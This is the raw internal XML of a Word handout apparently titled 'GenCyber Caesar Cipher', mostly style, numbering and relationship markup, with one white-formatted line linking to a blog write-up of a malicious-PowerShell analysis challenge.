    <w:p w14:paraId="2546AEAD" w14:textId="639FE42D" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B54231C" w14:textId="3A44F862" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7BD050" w14:textId="3CAFBC88" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1780C2F8" w14:textId="77777777" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D454E6" w14:textId="0A1CE511" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02210F5C" w14:textId="44401FA6" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00ED2EEE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="FFFFFF" w:themeColor="background1"/>
          </w:rPr>
          <w:t>Malicious PowerShell Analysis - James' Pereductions (jamesgibbins.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1614E0DA" w14:textId="77777777" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1517ACA5" w14:textId="7D316A77" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC69616" w14:textId="6B5B8296" w:rsidR="0099777E" w:rsidRPr="00765190" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC18E8E" w14:textId="75FE507B" w:rsidR="00765190" w:rsidRPr="00ED2EEE" w:rsidRDefault="00765190" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1922A76B" w14:textId="77777777" w:rsidR="00765190" w:rsidRPr="00ED2EEE" w:rsidRDefault="00765190" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="504DE0F3" w14:textId="46A07D82" w:rsidR="00176656" w:rsidRPr="00ED2EEE" w:rsidRDefault="00176656" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00176656" w:rsidRPr="00ED2EEE">
      <w:footerReference w:type="default" r:id="rId28"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="274" w:right="1341" w:bottom="1498"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0685" w14:textId="77777777" w:rsidR="009043EF" w:rsidRDefault="009043EF" w:rsidP="00A5065B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7E9B5BC7" w14:textId="77777777" w:rsidR="009043EF" w:rsidRDefault="009043EF" w:rsidP="00A5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A00C" w14:textId="2DCC2686" w:rsidR="00A5065B" w:rsidRDefault="00A5065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25E1" w14:textId="77777777" w:rsidR="009043EF" w:rsidRDefault="009043EF" w:rsidP="00A5065B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3C9F3C15" w14:textId="77777777" w:rsidR="009043EF" w:rsidRDefault="009043EF" w:rsidP="00A50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1F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A950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10020"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D324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E6254"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4D4454E"/>
    <w:lvl w:ilvl="0" w:tplc="486CE8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D0719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947B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2EF8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A0398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E1D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BE33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03B8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8A8FE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18616363">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="639191784">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="16640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A1"/>
    <w:rsid w:val="00032C1B"/>
    <w:rsid w:val="00091D0A"/>
    <w:rsid w:val="00097C8D"/>
    <w:rsid w:val="000D758F"/>
    <w:rsid w:val="00176656"/>
    <w:rsid w:val="00201EF2"/>
    <w:rsid w:val="0029591B"/>
    <w:rsid w:val="002B597D"/>
    <w:rsid w:val="003222B4"/>
    <w:rsid w:val="0036052C"/>
    <w:rsid w:val="00695990"/>
    <w:rsid w:val="006B5274"/>
    <w:rsid w:val="007265A1"/>
    <w:rsid w:val="00765190"/>
    <w:rsid w:val="007D1EC5"/>
    <w:rsid w:val="009043EF"/>
    <w:rsid w:val="00941E14"/>
    <w:rsid w:val="0099777E"/>
    <w:rsid w:val="00A5065B"/>
    <w:rsid w:val="00BA3CA3"/>
    <w:rsid w:val="00C119AC"/>
    <w:rsid w:val="00CC6C20"/>
    <w:rsid w:val="00DD443A"/>
    <w:rsid w:val="00DD5FCE"/>
    <w:rsid w:val="00ED2EEE"/>
    <w:rsid w:val="00F27D81"/>
    <w:rsid w:val="00FA15B6"/>
    <w:rsid w:val="00FB544B"/>
    <w:rsid w:val="00FC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3005"/>
  <w15:docId w15:val="{FFBDE5A3-8DD7-9C42-812A-996F5F5A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53" w:lineRule="auto"/>
      <w:ind w:left="10" w:right="37" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pBdr>
        <w:top w:val="single" w:sz="24" w:space="0" w:color="E68923"/>
        <w:left w:val="single" w:sz="24" w:space="0" w:color="E68923"/>
        <w:bottom w:val="single" w:sz="24" w:space="0" w:color="E68923"/>
        <w:right w:val="single" w:sz="24" w:space="0" w:color="E68923"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="E68923"/>
      <w:spacing w:after="493" w:line="265" w:lineRule="auto"/>
      <w:ind w:left="11" w:hanging="10"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
      <w:b/>
      <w:i/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006B527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i/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="2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5065B"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A5065B"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A5065B"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A50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65B"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A50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65B"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00941E14"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00FC78E2"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="006B527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4402">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="467018610">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="685210575">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="689724858">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="751390803">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="927810203">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1159617955">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1232692111">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="196904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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by/4.0/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bit.ly/e0Mw9w"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creativecommons.org/licenses/by/4.0/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by/4.0/"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reativecommons.org/licenses/by/4.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hyperlink" Target="http://www.CyberChef.io"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reativecommons.org/licenses/by/4.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 TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jamesgibbins.com/posts/btlo-challenge-malicious-powershell-analysi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61C6-02E8-4183-8865-A99CDE803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CDE36-4F10-46FA-8663-F3E10E126E9B}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="7946296d-5168-4570-982d-d761a59d8353"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{572FEA16-E011-472B-B855-3B08CEF64BDC}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3C93443D-59CE-4701-9923-5D1503C4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GenCyber Caesar Cipher</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GenCyber Caesar Cipher</dc:title>
  <dc:subject/>
  <dc:creator>Ouyporn, Joshua</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Sid3sw1p3@outlook.com</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2023-06-12T04:49:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-12T04:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-12T04:53:00Z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0x010100CD3292B6A48D484D9DF1C39664DD87DE</vt:lpwstr>
  </property>
</Properties>
</file>